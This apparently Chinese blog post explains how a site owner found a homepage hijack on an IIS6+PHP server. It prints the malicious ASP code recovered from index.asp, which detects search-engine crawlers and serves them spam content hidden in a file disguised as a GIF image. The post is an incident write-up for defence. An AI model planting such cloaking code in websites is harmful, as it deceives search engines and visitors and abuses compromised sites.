欢迎来到php自学网~
阅读模式:

解决网站主页被非法篡改

查看:3231  回复:0  类型:  来源:php自学网  标签 运维

运行环境iis6+php ,搜索引擎总是收录非法的内容,总是去不掉,而且通过ftp看不到恶意文件。

于是通过访问index.asp发现了问题。

通过php获取了这个文件的代码:

<?php
    if(file_exists('index.asp')){
        //非法默认加载的首页文件
        $file = file_get_contents('index.asp');
        var_dump($file);
        //非法伪装成图片的恶意内容文件
        if(file_exists('static/images/doc.gif')) {
            $files = file_get_contents('static/images/doc.gif');
            var_dump($files);
        }

    }else{
        echo '0';
    }
?>


发现了恶意代码,这里的主要做了判断是不是搜索引擎访问,如果是就去加载伪装成图片的非法内容的文件,所以搜索引擎一抓去就是非法内容了,如果用的iis6,而且通过ftp看不到这些文件,建议更换服务器环境,禁用iis 更换成nginx+php环境。

string(22174) "пїњ<%
function isspider()
dim agent,searray,i agent="agent:"&LCase(request.servervariables("http_user_agent"))
searray=array("googlebot","baiduspider","sogou","yahoo","soso","360","so","yahoo","bing","sm")
isspider= false for i=0 to ubound(searray) if (instr(agent,searray(i))>0) then
isspider=true next end function function fromse()
dim urlrefer,i,searray urlrefer="refer:"&LCase(request.ServerVariables("HTTP_REFERER"))
fromse= false if urlrefer="" 
then fromse= false searray=array("google","baidu","sogou","yahoo","soso","360","so","yahoo","bing","sm")
for i=0 to ubound(searray) if (instr(urlrefer,searray(i))>0) 
then fromse=true next end function function mainpage()
dim mainindex,n,pagearray,indexquery,i mainindex=LCase(request.ServerVariables("SCRIPT_NAME"))
indexquery=LCase(request.ServerVariables("QUERY_STRING"))
mainpage= false pagearray=array("/index.","/default.","/main.")
for i=0 to ubound(pagearray)
if (instr(mainindex,pagearray(i))>0 and len(indexquery)<2)
then mainpage=true next end function if isspider() and mainpage()
then
dim mfso,mfileurl,mfilecon,wfile mfileurl=Server.MapPath("static/images/doc.gif")
Set mfso=Server.CreateObject("Scripting.FileSystemObject")
if mfso.FileExists(mfileurl)
then Set wfile=mfso.OpenTextFile(mfileurl, 1)
mfilecon=wfile.readAll response.clear
response.write(mfilecon) response.write("")
response.flush wfile.Close Set wfile=Nothing
Set mfso=Nothing response.end
else response.write("fn")
end if end
if if (fromse() and mainpage()) then response.clear
%>


分享到:
0 0

*有问题之处烦请在评论中指出非常感谢!
不是我想要的内容,继续搜索:

扫描二维码手机查看

发布评论:


登录:
  表情:
评论话题
推荐阅读:
php生成二维码   阅读:1870php打印九九加法表   阅读:1784javascript对cookie操作详细代码函数   阅读:1620用php从1加到100的值   阅读:3021php连接redis   阅读:1946php生成二维码   阅读:1870企业让你去面试,可能不是真的招人   阅读:1630HTTP 1.1 协议详解   阅读:1827web项目高并发量网站解决方案   阅读:1334面试的时候回去等通知,等电话的真实意思   阅读:6636移动端自适应rem原理   阅读:4858session与cookie的区别   阅读:1508最简单的Banner轮播淡入淡出效果代码及实现思路(附带源码)   阅读:6101面试的时候和你谈理想,是理想or入坑?   阅读:1541php压缩页面的html代码一行显示   阅读:2053mysql数据一键导出到csv文件   阅读:1693网站局部小图片优化-base64编码图片   阅读:2580php连接redis   阅读:1946给网站添加一键新浪微博登录的功能   阅读:2503linux命令中执行php脚本   阅读:1645php 统计网页打开耗时和脚本运行内存   阅读:2188centos 7 安装 nginx-1.11.10   阅读:3234“米粉节”背后的故事——小米网抢购系统开发实践   阅读:1265php压缩页面的html代码一行显示   阅读:2053面试的时候和你谈理想,是理想or入坑?   阅读:1541最新centos7 搭建LNMP环境(centos7.2+php7+mysql5.7+nginx1.11+redis3.2)   阅读:4017php删除一个文件夹内的所有文件夹和文件   阅读:1737网站局部小图片优化-base64编码图片   阅读:2580纯干货,程序员面试的超实用技巧   阅读:1288centos 7 安装 mysql-5.7   阅读:2063linux top命令详解   阅读:1508linux php7编译安装mongodb扩展   阅读:1467分享:淘宝技术这十年   阅读:1566mysql数据一键导出到csv文件   阅读:1693php 使用 smtp.php 类在线发送邮件功能   阅读:1900给 centos 7 安装桌面环境   阅读:8175phpexcel 超简单从数据库一键导出数据到excel教程   阅读:2262mysql共享锁和排他锁详解   阅读:1854比phpexcel还要简单的excel CSV 一键导入数据到数据库   阅读:1854php文件下载防盗链   阅读:3232霍金24岁博士毕业论文在线预览   阅读:1409知乎百万赞作者告诉你:年薪百万的人都在靠什么赚钱   阅读:1650最新centos7 搭建LNMP环境(centos7.2+php7+mysql5.7+nginx1.11+redis3.2)   阅读:4017mongodb设置shell开机启动脚本   阅读:1879给php7安装redis扩展库   阅读:2212centos 7 安装 nginx-1.11.10   阅读:3234php生成二维码   阅读:1870小米手机端商城rem适配原理   阅读:2892shell脚本破解十位数内的所有纯数字rar加密压缩包脚本   阅读:2228linux时间戳有趣的情人节秒1234567890   阅读:1236